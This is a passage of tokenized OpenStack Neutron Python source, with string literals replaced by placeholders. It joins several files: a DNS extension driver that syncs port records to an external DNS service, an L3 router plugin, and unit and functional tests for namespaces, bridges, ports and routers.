DNSDOMAIN ] = new_value <EOL> else : <EOL> plugin_context . session . delete ( net_dns_domain ) <EOL> db_data [ dns . DNSDOMAIN ] = '<STR_LIT>' <EOL> elif new_value : <EOL> plugin_context . session . add ( dns_db . NetworkDNSDomain ( <EOL> network_id = net_id , dns_domain = new_value ) ) <EOL> db_data [ dns . DNSDOMAIN ] = new_value <EOL> def process_create_port ( self , plugin_context , request_data , db_data ) : <EOL> if not request_data [ dns . DNSNAME ] : <EOL> return <EOL> network = self . _get_network ( plugin_context , db_data [ '<STR_LIT>' ] ) <EOL> if not network [ dns . DNSDOMAIN ] : <EOL> return <EOL> if self . external_dns_not_needed ( plugin_context , network ) : <EOL> return <EOL> plugin_context . session . add ( dns_db . PortDNS ( <EOL> port_id = db_data [ '<STR_LIT:id>' ] , <EOL> current_dns_name = request_data [ dns . DNSNAME ] , <EOL> current_dns_domain = network [ dns . DNSDOMAIN ] , <EOL> previous_dns_name = '<STR_LIT>' , previous_dns_domain = '<STR_LIT>' ) ) <EOL> def process_update_port ( self , plugin_context , request_data , db_data ) : <EOL> dns_name = request_data . get ( dns . DNSNAME ) <EOL> has_fixed_ips = '<STR_LIT>' in request_data <EOL> if dns_name is None and not has_fixed_ips : <EOL> return <EOL> network = self . _get_network ( plugin_context , db_data [ '<STR_LIT>' ] ) <EOL> if not network [ dns . DNSDOMAIN ] : <EOL> return <EOL> if self . external_dns_not_needed ( plugin_context , network ) : <EOL> return <EOL> dns_domain = network [ dns . DNSDOMAIN ] <EOL> dns_data_db = plugin_context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = db_data [ '<STR_LIT:id>' ] ) . 
one_or_none ( ) <EOL> if dns_data_db : <EOL> is_dns_name_changed = ( dns_name is not None and <EOL> dns_data_db [ '<STR_LIT>' ] != dns_name ) <EOL> if is_dns_name_changed or ( has_fixed_ips and <EOL> dns_data_db [ '<STR_LIT>' ] ) : <EOL> dns_data_db [ '<STR_LIT>' ] = ( <EOL> dns_data_db [ '<STR_LIT>' ] ) <EOL> dns_data_db [ '<STR_LIT>' ] = ( <EOL> dns_data_db [ '<STR_LIT>' ] ) <EOL> if is_dns_name_changed : <EOL> dns_data_db [ '<STR_LIT>' ] = dns_name <EOL> if dns_name : <EOL> dns_data_db [ '<STR_LIT>' ] = dns_domain <EOL> else : <EOL> dns_data_db [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return <EOL> if dns_name : <EOL> plugin_context . session . add ( dns_db . PortDNS ( <EOL> port_id = db_data [ '<STR_LIT:id>' ] , <EOL> current_dns_name = dns_name , <EOL> current_dns_domain = dns_domain , <EOL> previous_dns_name = '<STR_LIT>' , previous_dns_domain = '<STR_LIT>' ) ) <EOL> def external_dns_not_needed ( self , context , network ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def extend_network_dict ( self , session , db_data , response_data ) : <EOL> response_data [ dns . DNSDOMAIN ] = '<STR_LIT>' <EOL> if db_data . dns_domain : <EOL> response_data [ dns . DNSDOMAIN ] = db_data . dns_domain [ dns . DNSDOMAIN ] <EOL> return response_data <EOL> def extend_port_dict ( self , session , db_data , response_data ) : <EOL> response_data [ dns . DNSNAME ] = db_data [ dns . DNSNAME ] <EOL> return response_data <EOL> def _get_network ( self , context , network_id ) : <EOL> plugin = manager . NeutronManager . get_plugin ( ) <EOL> return plugin . get_network ( context , network_id ) <EOL> class DNSExtensionDriverML2 ( DNSExtensionDriver ) : <EOL> def initialize ( self ) : <EOL> LOG . info ( _LI ( "<STR_LIT>" ) ) <EOL> def _is_tunnel_tenant_network ( self , provider_net ) : <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> tunnel_ranges = cfg . CONF . ml2_type_geneve . vni_ranges <EOL> elif provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> tunnel_ranges = cfg . CONF . 
ml2_type_vxlan . vni_ranges <EOL> else : <EOL> tunnel_ranges = cfg . CONF . ml2_type_gre . tunnel_id_ranges <EOL> segmentation_id = int ( provider_net [ '<STR_LIT>' ] ) <EOL> for entry in tunnel_ranges : <EOL> entry = entry . strip ( ) <EOL> tun_min , tun_max = entry . split ( '<STR_LIT::>' ) <EOL> tun_min = tun_min . strip ( ) <EOL> tun_max = tun_max . strip ( ) <EOL> return int ( tun_min ) <= segmentation_id <= int ( tun_max ) <EOL> def _is_vlan_tenant_network ( self , provider_net ) : <EOL> network_vlan_ranges = plugin_utils . parse_network_vlan_ranges ( <EOL> cfg . CONF . ml2_type_vlan . network_vlan_ranges ) <EOL> vlan_ranges = network_vlan_ranges [ provider_net [ '<STR_LIT>' ] ] <EOL> if not vlan_ranges : <EOL> return False <EOL> segmentation_id = int ( provider_net [ '<STR_LIT>' ] ) <EOL> for vlan_range in vlan_ranges : <EOL> if vlan_range [ <NUM_LIT:0> ] <= segmentation_id <= vlan_range [ <NUM_LIT:1> ] : <EOL> return True <EOL> def external_dns_not_needed ( self , context , network ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return True <EOL> if network [ '<STR_LIT>' ] : <EOL> return True <EOL> segments = db . get_network_segments ( context . session , network [ '<STR_LIT:id>' ] ) <EOL> if len ( segments ) > <NUM_LIT:1> : <EOL> return False <EOL> provider_net = segments [ <NUM_LIT:0> ] <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return True <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return False <EOL> if provider_net [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return self . _is_vlan_tenant_network ( provider_net ) <EOL> if provider_net [ '<STR_LIT>' ] in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _is_tunnel_tenant_network ( provider_net ) <EOL> return True <EOL> DNS_DRIVER = None <EOL> def _get_dns_driver ( ) : <EOL> global DNS_DRIVER <EOL> if DNS_DRIVER : <EOL> return DNS_DRIVER <EOL> if not cfg . CONF . 
external_dns_driver : <EOL> return <EOL> try : <EOL> DNS_DRIVER = driver . ExternalDNSService . get_instance ( ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> cfg . CONF . external_dns_driver ) <EOL> return DNS_DRIVER <EOL> except ImportError : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> raise dns . ExternalDNSDriverNotFound ( <EOL> driver = cfg . CONF . external_dns_driver ) <EOL> def _create_port_in_external_dns_service ( resource , event , trigger , ** kwargs ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return <EOL> context = kwargs [ '<STR_LIT>' ] <EOL> port = kwargs [ '<STR_LIT:port>' ] <EOL> dns_data_db = context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = port [ '<STR_LIT:id>' ] ) . one_or_none ( ) <EOL> if not dns_data_db : <EOL> return <EOL> records = [ ip [ '<STR_LIT>' ] for ip in port [ '<STR_LIT>' ] ] <EOL> _send_data_to_external_dns_service ( context , dns_driver , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> records ) <EOL> def _send_data_to_external_dns_service ( context , dns_driver , dns_domain , <EOL> dns_name , records ) : <EOL> try : <EOL> dns_driver . create_record_set ( context , dns_domain , dns_name , records ) <EOL> except ( dns . DNSDomainNotFound , dns . DuplicateRecordSet ) as e : <EOL> LOG . exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> % { "<STR_LIT:name>" : dns_name , <EOL> "<STR_LIT>" : dns_domain , <EOL> "<STR_LIT:message>" : e . msg } ) <EOL> def _remove_data_from_external_dns_service ( context , dns_driver , dns_domain , <EOL> dns_name , records ) : <EOL> try : <EOL> dns_driver . delete_record_set ( context , dns_domain , dns_name , records ) <EOL> except ( dns . DNSDomainNotFound , dns . DuplicateRecordSet ) as e : <EOL> LOG . 
exception ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> % { "<STR_LIT:name>" : dns_name , <EOL> "<STR_LIT>" : dns_domain , <EOL> "<STR_LIT:message>" : e . msg , <EOL> "<STR_LIT>" : '<STR_LIT:U+002CU+0020>' . join ( records ) } ) <EOL> def _update_port_in_external_dns_service ( resource , event , trigger , ** kwargs ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return <EOL> context = kwargs [ '<STR_LIT>' ] <EOL> updated_port = kwargs [ '<STR_LIT:port>' ] <EOL> original_port = kwargs . get ( '<STR_LIT>' ) <EOL> if not original_port : <EOL> return <EOL> original_ips = [ ip [ '<STR_LIT>' ] for ip in original_port [ '<STR_LIT>' ] ] <EOL> updated_ips = [ ip [ '<STR_LIT>' ] for ip in updated_port [ '<STR_LIT>' ] ] <EOL> if ( updated_port [ dns . DNSNAME ] == original_port [ dns . DNSNAME ] and <EOL> set ( original_ips ) == set ( updated_ips ) ) : <EOL> return <EOL> if ( updated_port [ dns . DNSNAME ] == original_port [ dns . DNSNAME ] and <EOL> not original_port [ dns . DNSNAME ] ) : <EOL> return <EOL> dns_data_db = context . session . query ( dns_db . PortDNS ) . filter_by ( <EOL> port_id = updated_port [ '<STR_LIT:id>' ] ) . one_or_none ( ) <EOL> if not dns_data_db : <EOL> return <EOL> if dns_data_db [ '<STR_LIT>' ] : <EOL> _remove_data_from_external_dns_service ( <EOL> context , dns_driver , dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , original_ips ) <EOL> if dns_data_db [ '<STR_LIT>' ] : <EOL> _send_data_to_external_dns_service ( context , dns_driver , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , <EOL> updated_ips ) <EOL> def _delete_port_in_external_dns_service ( resource , event , trigger , ** kwargs ) : <EOL> dns_driver = _get_dns_driver ( ) <EOL> if not dns_driver : <EOL> return <EOL> context = kwargs [ '<STR_LIT>' ] <EOL> port_id = kwargs [ '<STR_LIT>' ] <EOL> dns_data_db = context . session . query ( dns_db . PortDNS ) . 
filter_by ( <EOL> port_id = port_id ) . one_or_none ( ) <EOL> if not dns_data_db : <EOL> return <EOL> if dns_data_db [ '<STR_LIT>' ] : <EOL> ip_allocations = context . session . query ( <EOL> models_v2 . IPAllocation ) . filter_by ( port_id = port_id ) . all ( ) <EOL> records = [ alloc [ '<STR_LIT>' ] for alloc in ip_allocations ] <EOL> _remove_data_from_external_dns_service ( <EOL> context , dns_driver , dns_data_db [ '<STR_LIT>' ] , <EOL> dns_data_db [ '<STR_LIT>' ] , records ) <EOL> def subscribe ( ) : <EOL> registry . subscribe ( <EOL> _create_port_in_external_dns_service , resources . PORT , <EOL> events . AFTER_CREATE ) <EOL> registry . subscribe ( <EOL> _update_port_in_external_dns_service , resources . PORT , <EOL> events . AFTER_UPDATE ) <EOL> registry . subscribe ( <EOL> _delete_port_in_external_dns_service , resources . PORT , <EOL> events . BEFORE_DELETE ) <EOL> subscribe ( ) </s>
<s> from neutron_lib import constants as n_const <EOL> from oslo_config import cfg <EOL> from oslo_log import helpers as log_helpers <EOL> from oslo_utils import importutils <EOL> from neutron . api . rpc . agentnotifiers import l3_rpc_agent_api <EOL> from neutron . api . rpc . handlers import l3_rpc <EOL> from neutron . common import rpc as n_rpc <EOL> from neutron . common import topics <EOL> from neutron . db import common_db_mixin <EOL> from neutron . db import dns_db <EOL> from neutron . db import extraroute_db <EOL> from neutron . db import l3_db <EOL> from neutron . db import l3_dvr_ha_scheduler_db <EOL> from neutron . db import l3_dvrscheduler_db <EOL> from neutron . db import l3_gwmode_db <EOL> from neutron . db import l3_hamode_db <EOL> from neutron . plugins . common import constants <EOL> from neutron . quota import resource_registry <EOL> from neutron . services import service_base <EOL> class L3RouterPlugin ( service_base . ServicePluginBase , <EOL> common_db_mixin . CommonDbMixin , <EOL> extraroute_db . ExtraRoute_db_mixin , <EOL> l3_hamode_db . L3_HA_NAT_db_mixin , <EOL> l3_gwmode_db . L3_NAT_db_mixin , <EOL> l3_dvr_ha_scheduler_db . L3_DVR_HA_scheduler_db_mixin , <EOL> dns_db . DNSDbMixin ) : <EOL> """<STR_LIT>""" <EOL> supported_extension_aliases = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> @ resource_registry . tracked_resources ( router = l3_db . Router , <EOL> floatingip = l3_db . FloatingIP ) <EOL> def __init__ ( self ) : <EOL> self . router_scheduler = importutils . import_object ( <EOL> cfg . CONF . router_scheduler_driver ) <EOL> self . start_periodic_l3_agent_status_check ( ) <EOL> super ( L3RouterPlugin , self ) . __init__ ( ) <EOL> if '<STR_LIT>' in self . supported_extension_aliases : <EOL> l3_dvrscheduler_db . subscribe ( ) <EOL> l3_db . subscribe ( ) <EOL> self . start_rpc_listeners ( ) <EOL> @ log_helpers . 
log_method_call <EOL> def start_rpc_listeners ( self ) : <EOL> self . topic = topics . L3PLUGIN <EOL> self . conn = n_rpc . create_connection ( ) <EOL> self . agent_notifiers . update ( <EOL> { n_const . AGENT_TYPE_L3 : l3_rpc_agent_api . L3AgentNotifyAPI ( ) } ) <EOL> self . endpoints = [ l3_rpc . L3RpcCallback ( ) ] <EOL> self . conn . create_consumer ( self . topic , self . endpoints , <EOL> fanout = False ) <EOL> return self . conn . consume_in_threads ( ) <EOL> def get_plugin_type ( self ) : <EOL> return constants . L3_ROUTER_NAT <EOL> def get_plugin_description ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def create_floatingip ( self , context , floatingip ) : <EOL> """<STR_LIT>""" <EOL> return super ( L3RouterPlugin , self ) . create_floatingip ( <EOL> context , floatingip , <EOL> initial_status = n_const . FLOATINGIP_STATUS_DOWN ) </s>
<s> import functools <EOL> import random <EOL> import netaddr <EOL> from neutron . tests . common . exclusive_resources import resource_allocator <EOL> def get_random_ip ( low , high ) : <EOL> parent_range = netaddr . IPRange ( low , high ) <EOL> return str ( random . choice ( parent_range ) ) <EOL> class ExclusiveIPAddress ( resource_allocator . ExclusiveResource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , low , high ) : <EOL> super ( ExclusiveIPAddress , self ) . __init__ ( <EOL> '<STR_LIT>' , functools . partial ( get_random_ip , low , high ) ) <EOL> def _setUp ( self ) : <EOL> super ( ExclusiveIPAddress , self ) . _setUp ( ) <EOL> self . address = netaddr . IPAddress ( self . resource ) </s>
<s> import mock <EOL> from oslo_utils import uuidutils <EOL> from neutron . agent . l3 import dvr_snat_ns <EOL> from neutron . agent . l3 import namespace_manager <EOL> from neutron . agent . l3 import namespaces <EOL> from neutron . agent . linux import ip_lib <EOL> from neutron . tests . functional import base <EOL> _uuid = uuidutils . generate_uuid <EOL> class NamespaceManagerTestFramework ( base . BaseSudoTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( NamespaceManagerTestFramework , self ) . setUp ( ) <EOL> self . agent_conf = mock . MagicMock ( ) <EOL> self . metadata_driver_mock = mock . Mock ( ) <EOL> self . namespace_manager = namespace_manager . NamespaceManager ( <EOL> self . agent_conf , driver = None , <EOL> metadata_driver = self . metadata_driver_mock ) <EOL> def _create_namespace ( self , router_id , ns_class ) : <EOL> namespace = ns_class ( router_id , self . agent_conf , driver = None , <EOL> use_ipv6 = False ) <EOL> namespace . create ( ) <EOL> self . addCleanup ( self . _delete_namespace , namespace ) <EOL> return namespace . name <EOL> def _delete_namespace ( self , namespace ) : <EOL> try : <EOL> namespace . delete ( ) <EOL> except RuntimeError as e : <EOL> if '<STR_LIT>' not in str ( e ) : <EOL> raise e <EOL> def _namespace_exists ( self , namespace ) : <EOL> ip = ip_lib . IPWrapper ( namespace = namespace ) <EOL> return ip . netns . exists ( namespace ) <EOL> class NamespaceManagerTestCase ( NamespaceManagerTestFramework ) : <EOL> def test_namespace_manager ( self ) : <EOL> router_id = _uuid ( ) <EOL> router_id_to_delete = _uuid ( ) <EOL> to_keep = set ( ) <EOL> to_delete = set ( ) <EOL> to_retrieve = set ( ) <EOL> to_keep . add ( self . _create_namespace ( router_id , <EOL> namespaces . RouterNamespace ) ) <EOL> to_keep . add ( self . _create_namespace ( router_id , <EOL> dvr_snat_ns . SnatNamespace ) ) <EOL> to_delete . add ( self . _create_namespace ( router_id_to_delete , <EOL> dvr_snat_ns . 
SnatNamespace ) ) <EOL> to_retrieve = to_keep | to_delete <EOL> with mock . patch . object ( namespace_manager . NamespaceManager , '<STR_LIT>' , <EOL> return_value = to_retrieve ) : <EOL> with self . namespace_manager as ns_manager : <EOL> for ns_name in to_keep : <EOL> id_to_keep = ns_manager . get_prefix_and_id ( ns_name ) [ <NUM_LIT:1> ] <EOL> ns_manager . keep_router ( id_to_keep ) <EOL> for ns_name in to_keep : <EOL> self . assertTrue ( self . _namespace_exists ( ns_name ) ) <EOL> for ns_name in to_delete : <EOL> ( self . metadata_driver_mock . destroy_monitored_metadata_proxy . <EOL> assert_called_once_with ( mock . ANY , <EOL> router_id_to_delete , <EOL> self . agent_conf ) ) <EOL> self . assertFalse ( self . _namespace_exists ( ns_name ) ) </s>
<s> import fixtures <EOL> import mock <EOL> from neutron_lib import constants <EOL> from neutron . agent . linux import ip_lib <EOL> from neutron . plugins . ml2 . drivers . linuxbridge . agent import linuxbridge_neutron_agent as lb_agent <EOL> from neutron . tests . common import config_fixtures <EOL> from neutron . tests . common import net_helpers <EOL> from neutron . tests . functional import base <EOL> from neutron . tests import tools <EOL> class LinuxbridgeCleanupTest ( base . BaseSudoTestCase ) : <EOL> def _test_linuxbridge_cleanup ( self , bridge_exists , callback ) : <EOL> br_fixture = self . useFixture ( <EOL> tools . SafeCleanupFixture ( <EOL> net_helpers . LinuxBridgeFixture ( <EOL> prefix = lb_agent . BRIDGE_NAME_PREFIX ) ) ) . fixture <EOL> config = callback ( br_fixture ) <EOL> config . update ( { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:False>' } } ) <EOL> temp_dir = self . useFixture ( fixtures . TempDir ( ) ) . path <EOL> conf = self . useFixture ( config_fixtures . ConfigFileFixture ( <EOL> base_filename = '<STR_LIT>' , <EOL> config = config , <EOL> temp_dir = temp_dir ) ) <EOL> cmd = '<STR_LIT>' , '<STR_LIT>' , conf . filename <EOL> ip_wrapper = ip_lib . IPWrapper ( br_fixture . namespace ) <EOL> ip_wrapper . netns . execute ( cmd ) <EOL> self . assertEqual ( bridge_exists , ip_lib . device_exists ( <EOL> br_fixture . bridge . name , br_fixture . namespace ) ) <EOL> def test_cleanup_empty_bridge ( self ) : <EOL> def callback ( br_fixture ) : <EOL> return config_fixtures . ConfigDict ( ) <EOL> self . _test_linuxbridge_cleanup ( False , callback ) <EOL> def test_no_cleanup_bridge_with_tap ( self ) : <EOL> def callback ( br_fixture ) : <EOL> mock . patch . object ( <EOL> net_helpers , '<STR_LIT>' , <EOL> new_callable = mock . PropertyMock ( <EOL> return_value = constants . TAP_DEVICE_PREFIX + '<STR_LIT:0>' ) ) . start ( ) <EOL> mock . patch . object ( <EOL> net_helpers , '<STR_LIT>' , <EOL> new_callable = mock . 
PropertyMock ( <EOL> return_value = constants . TAP_DEVICE_PREFIX + '<STR_LIT:1>' ) ) . start ( ) <EOL> self . useFixture ( <EOL> tools . SafeCleanupFixture ( <EOL> net_helpers . LinuxBridgePortFixture ( <EOL> br_fixture . bridge , br_fixture . namespace ) ) ) <EOL> return config_fixtures . ConfigDict ( ) <EOL> self . _test_linuxbridge_cleanup ( True , callback ) <EOL> def test_no_cleanup_bridge_in_bridge_mappings ( self ) : <EOL> def callback ( br_fixture ) : <EOL> br_name = br_fixture . bridge . name <EOL> conf = config_fixtures . ConfigDict ( ) <EOL> conf . update ( <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' % br_name } } ) <EOL> return conf <EOL> self . _test_linuxbridge_cleanup ( True , callback ) </s>
<s> """<STR_LIT>""" <EOL> from tempest . lib import exceptions as tlib_exceptions <EOL> from neutron . tests import base <EOL> from neutron . tests . retargetable import client_fixtures <EOL> from tempest import test as t_test <EOL> class RestClientFixture ( client_fixtures . AbstractClientFixture ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def client ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> manager = t_test . BaseTestCase . get_client_manager ( ) <EOL> self . _client = manager . network_client <EOL> return self . _client <EOL> @ property <EOL> def NotFound ( self ) : <EOL> return tlib_exceptions . NotFound <EOL> def _cleanup_network ( self , id_ ) : <EOL> try : <EOL> self . delete_network ( id_ ) <EOL> except self . NotFound : <EOL> pass <EOL> def create_network ( self , ** kwargs ) : <EOL> network = self . _create_network ( ** kwargs ) <EOL> self . addCleanup ( self . _cleanup_network , network . id ) <EOL> return network <EOL> def _create_network ( self , ** kwargs ) : <EOL> body = self . client . create_network ( ** kwargs ) <EOL> return base . AttributeDict ( body [ '<STR_LIT>' ] ) <EOL> def update_network ( self , id_ , ** kwargs ) : <EOL> body = self . client . update_network ( id_ , ** kwargs ) <EOL> return base . AttributeDict ( body [ '<STR_LIT>' ] ) <EOL> def get_network ( self , id_ , ** kwargs ) : <EOL> body = self . client . show_network ( id_ , ** kwargs ) <EOL> return base . AttributeDict ( body [ '<STR_LIT>' ] ) <EOL> def get_networks ( self , ** kwargs ) : <EOL> body = self . client . list_networks ( ** kwargs ) <EOL> return [ base . AttributeDict ( x ) for x in body [ '<STR_LIT>' ] ] <EOL> def delete_network ( self , id_ ) : <EOL> self . client . delete_network ( id_ ) </s>
<s> from tempest import test <EOL> from neutron . tests . tempest . api import base <EOL> class PortsTestJSON ( base . BaseNetworkTest ) : <EOL> @ classmethod <EOL> def resource_setup ( cls ) : <EOL> super ( PortsTestJSON , cls ) . resource_setup ( ) <EOL> cls . network = cls . create_network ( ) <EOL> @ test . idempotent_id ( '<STR_LIT>' ) <EOL> @ test . requires_ext ( extension = "<STR_LIT>" , <EOL> service = "<STR_LIT>" ) <EOL> def test_create_update_port_description ( self ) : <EOL> body = self . create_port ( self . network , <EOL> description = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:description>' ] ) <EOL> body = self . client . list_ports ( id = body [ '<STR_LIT:id>' ] ) [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:description>' ] ) <EOL> body = self . client . update_port ( body [ '<STR_LIT:id>' ] , <EOL> description = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:port>' ] [ '<STR_LIT:description>' ] ) <EOL> body = self . client . list_ports ( id = body [ '<STR_LIT:port>' ] [ '<STR_LIT:id>' ] ) [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , body [ '<STR_LIT:description>' ] ) </s>
<s> import mock <EOL> from oslo_utils import uuidutils <EOL> from neutron . agent . l3 import ha_router <EOL> from neutron . tests import base <EOL> _uuid = uuidutils . generate_uuid <EOL> class TestBasicRouterOperations ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestBasicRouterOperations , self ) . setUp ( ) <EOL> def _create_router ( self , router = None , ** kwargs ) : <EOL> if not router : <EOL> router = mock . MagicMock ( ) <EOL> self . agent_conf = mock . Mock ( ) <EOL> self . router_id = _uuid ( ) <EOL> return ha_router . HaRouter ( mock . sentinel . enqueue_state , <EOL> self . router_id , <EOL> router , <EOL> self . agent_conf , <EOL> mock . sentinel . driver , <EOL> ** kwargs ) <EOL> def test_get_router_cidrs_returns_ha_cidrs ( self ) : <EOL> ri = self . _create_router ( ) <EOL> device = mock . MagicMock ( ) <EOL> device . name . return_value = '<STR_LIT>' <EOL> addresses = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ri . _get_cidrs_from_keepalived = mock . MagicMock ( return_value = addresses ) <EOL> self . assertEqual ( set ( addresses ) , ri . get_router_cidrs ( device ) ) <EOL> def test__add_default_gw_virtual_route ( self ) : <EOL> ri = self . _create_router ( ) <EOL> mock_instance = mock . Mock ( ) <EOL> mock_instance . virtual_routes . gateway_routes = [ ] <EOL> ri . _get_keepalived_instance = mock . Mock ( return_value = mock_instance ) <EOL> subnets = [ { '<STR_LIT:id>' : _uuid ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } ] <EOL> ex_gw_port = { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : subnets , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:id>' : _uuid ( ) , <EOL> '<STR_LIT>' : _uuid ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ri . _add_default_gw_virtual_route ( ex_gw_port , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( mock_instance . virtual_routes . gateway_routes ) ) <EOL> subnets . 
append ( { '<STR_LIT:id>' : _uuid ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ri . _add_default_gw_virtual_route ( ex_gw_port , '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( mock_instance . virtual_routes . gateway_routes ) ) </s>
<s> import mock <EOL> from neutron . agent . common import base_polling <EOL> from neutron . agent . linux import polling <EOL> from neutron . tests import base <EOL> class TestGetPollingManager ( base . BaseTestCase ) : <EOL> def test_return_always_poll_by_default ( self ) : <EOL> with polling . get_polling_manager ( ) as pm : <EOL> self . assertEqual ( pm . __class__ , base_polling . AlwaysPoll ) <EOL> def test_manage_polling_minimizer ( self ) : <EOL> mock_target = '<STR_LIT>' <EOL> with mock . patch ( '<STR_LIT>' % mock_target ) as mock_start : <EOL> with mock . patch ( '<STR_LIT>' % mock_target ) as mock_stop : <EOL> with polling . get_polling_manager ( minimize_polling = True ) as pm : <EOL> self . assertEqual ( pm . __class__ , <EOL> polling . InterfacePollingMinimizer ) <EOL> mock_stop . assert_has_calls ( [ mock . call ( ) ] ) <EOL> mock_start . assert_has_calls ( [ mock . call ( ) ] ) <EOL> class TestInterfacePollingMinimizer ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestInterfacePollingMinimizer , self ) . setUp ( ) <EOL> self . pm = polling . InterfacePollingMinimizer ( ) <EOL> def test_start_calls_monitor_start ( self ) : <EOL> with mock . patch . object ( self . pm . _monitor , '<STR_LIT:start>' ) as mock_start : <EOL> self . pm . start ( ) <EOL> mock_start . assert_called_with ( ) <EOL> def test_stop_calls_monitor_stop ( self ) : <EOL> with mock . patch . object ( self . pm . _monitor , '<STR_LIT>' ) as mock_stop : <EOL> self . pm . stop ( ) <EOL> mock_stop . assert_called_with ( ) <EOL> def mock_has_updates ( self , return_value ) : <EOL> target = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return mock . patch ( <EOL> target , <EOL> new_callable = mock . PropertyMock ( return_value = return_value ) , <EOL> ) <EOL> def test__is_polling_required_returns_when_updates_are_present ( self ) : <EOL> with self . mock_has_updates ( True ) : <EOL> self . assertTrue ( self . pm . _is_polling_required ( ) ) </s>
<s> import os <EOL> import mock <EOL> from neutron_lib . api import converters <EOL> from neutron_lib import constants <EOL> from neutron_lib import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_db import exception as db_exc <EOL> from oslo_policy import policy as oslo_policy <EOL> from oslo_utils import uuidutils <EOL> import six <EOL> from six import moves <EOL> import six . moves . urllib . parse as urlparse <EOL> import webob <EOL> from webob import exc <EOL> import webtest <EOL> from neutron . api import api_common <EOL> from neutron . api import extensions <EOL> from neutron . api . rpc . agentnotifiers import dhcp_rpc_agent_api <EOL> from neutron . api . v2 import attributes <EOL> from neutron . api . v2 import base as v2_base <EOL> from neutron . api . v2 import router <EOL> from neutron import context <EOL> from neutron import manager <EOL> from neutron import policy <EOL> from neutron import quota <EOL> from neutron . quota import resource_registry <EOL> from neutron . tests import base <EOL> from neutron . tests import fake_notifier <EOL> from neutron . tests import tools <EOL> from neutron . tests . unit import testlib_api <EOL> EXTDIR = os . path . join ( base . ROOTDIR , '<STR_LIT>' ) <EOL> _uuid = uuidutils . generate_uuid <EOL> def _get_path ( resource , id = None , action = None , fmt = None ) : <EOL> path = '<STR_LIT>' % resource <EOL> if id is not None : <EOL> path = path + '<STR_LIT>' % id <EOL> if action is not None : <EOL> path = path + '<STR_LIT>' % action <EOL> if fmt is not None : <EOL> path = path + '<STR_LIT>' % fmt <EOL> return path <EOL> class ResourceIndexTestCase ( base . BaseTestCase ) : <EOL> def test_index_json ( self ) : <EOL> index = webtest . TestApp ( router . Index ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) ) <EOL> res = index . get ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , res . json ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( res . json [ '<STR_LIT>' ] ) ) <EOL> resource = res . 
